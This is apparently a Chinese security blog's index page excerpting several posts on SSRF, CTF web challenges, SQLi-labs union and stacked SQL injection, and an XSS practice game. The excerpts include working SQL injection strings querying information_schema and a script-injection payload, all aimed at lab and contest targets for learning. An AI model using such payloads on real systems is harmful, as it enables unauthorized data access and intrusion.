SSRF 服务端请求伪造漏洞与利用学习
0X01 原理与危害
原理
SSRF(Server-Side Request Forgery)服务端请求伪造,是一种由攻击者构造形成由服务端发起请求的一个安全漏洞,目标是从外网无法访问的内部系统,利用漏洞伪造服务端发起请求,从而突破客户端获取不到的数据限制。对外发起网络请求的地方都可能存在SSRF漏洞。
危害
1.可以对外网、服务器所在内网,本地进行端口扫描,获取一些服务的Banner信息;
2.攻击运行在内网或本地的应用程序,向内部任意主机的任意端口发送精心构造的数据包;
3.对内网Web应用进行指纹识别,通过访问默认文件实现;
4.利用File协议去读取本地文件等。
0x02 判断与利用
漏洞场景
1.能填写链接的地方:
从URL上传图片
订阅R...
中关村网络与信息安全领域专项赛 Web&Misc
Web
Game
查看网页源代码,在/js/cqg.js发现关键操作如下:
if(score == 15){
$.ajax({
url: 'score.php',
type: 'POST',
data: 'score='+score,
success: function(data){
var data = data;
$("#output").text(data);
}
})
}
向score.phpPOST发送数据score=15即可获取flag.
$curl http://xxx.ichunqiu.com/...
QWB 3th Partial Writeup
Web
upload
首先进行信息搜集,dirsearch探测发现存在robots.txt、/upload/、www.tar.gz,下载源代码进行审计。
网站主要包含注册、登录、上传图片三个功能点,/upload/目录可查看已上传图片。
Cookie中user字段经过URL和Base64解码后发现如下序列化内容:
a:5:{s:2:"ID";i:3;s:8:"username";s:3:"3nd";s:5:"email";s:11:"[email protected]";s:8:"password";s:32:"9ee7098eadd66450d552896a0685ea09";s:3:"img";N;}
上传图片后Cookie user字段解码如下:
a:5:{s:2...
SQLi-labs Challenges
Less 54
Description: GET / challenge / Union / 10 queries allowed / Variation 1
要求从challenges数据库中获取secret_key,限制了查询次数为10。
#1.判断闭合方式 -> 单引号闭合
id=1' or '1'='1
#2.获取表名 -> PSYFDRBQFS
union select 1,group_concat(table_name),3 from information_schema.tables \
where table_schema='challenges'#
#3.获取字段名 -> id,sessid,secret_HOGR,tryy
union s...
SQLi-labs Stacked Injection
Stacked injection*
堆叠注入(Stacked injection),简而言之就是通过在可控输入点传送恶意语句从而执行多条(任意)SQL语句的注入方式。
原理: 使用分隔符(;)来表示一条sql语句的结束,插入新的执行语句。
局限性: 并不是每一个环境下都可以执行,可能受到API或者数据库引擎不支持的限制,当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序,同时堆叠注入产生的错误或结果一般不能在前端环境获取回显信息。
与联合注入(Union injection)的区别在于联合注入的语句类型有限,一般用来执行查询语句,而堆叠注入可执行任意语句。支持堆叠查询的服务:
SQL Server
...
SQLi-labs Advanced Injection
Less 23
Description: error based / strip comments
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
在获取id参数时进行了#、--注释符的过滤。
# id=-1' union select 1,database(),'3
SELECT * FROM users WHERE id='-1' union select 1,database(),’3’ limit 0,1
回显:Your Login name:security / Your Password:3
获取数据库和表名
union select 1,(select group_concat(schema...
XSS game alert(1) writeup
平台地址:https://xss.haozi.me/
Github项目:https://github.com/haozi/xss-demo
0x00
server code
function render (input) {
return '<div>' + input + '</div>'
}
input code
<script>alert(1)</script>
html
<div><script>alert(1)</script></div>
0x01
server code
function render (inp...
共计 56 篇文章,7 页。